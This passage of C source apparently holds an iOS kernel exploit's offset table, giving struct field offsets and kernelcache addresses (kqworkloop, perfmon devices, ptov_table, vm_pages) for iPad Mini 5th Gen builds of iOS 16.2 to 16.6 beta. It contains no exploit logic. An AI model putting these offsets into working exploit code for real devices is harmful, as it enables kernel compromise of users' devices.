.pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a361208, .kernelcache__gPhysBase = 0xfffffff007927ed0, .kernelcache__gPhysSize = 0xfffffff007927ed0 + 8, .kernelcache__gVirtBase = 0xfffffff0079260a8, .kernelcache__perfmon_devices = 0xfffffff00a39f4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed73c8, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39e990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39e988, .kernelcache__vn_kqfilter = 0xfffffff007f25f7c, }, // iPad Mini 5th Gen Wifi// // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Mini 5th Gen // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // 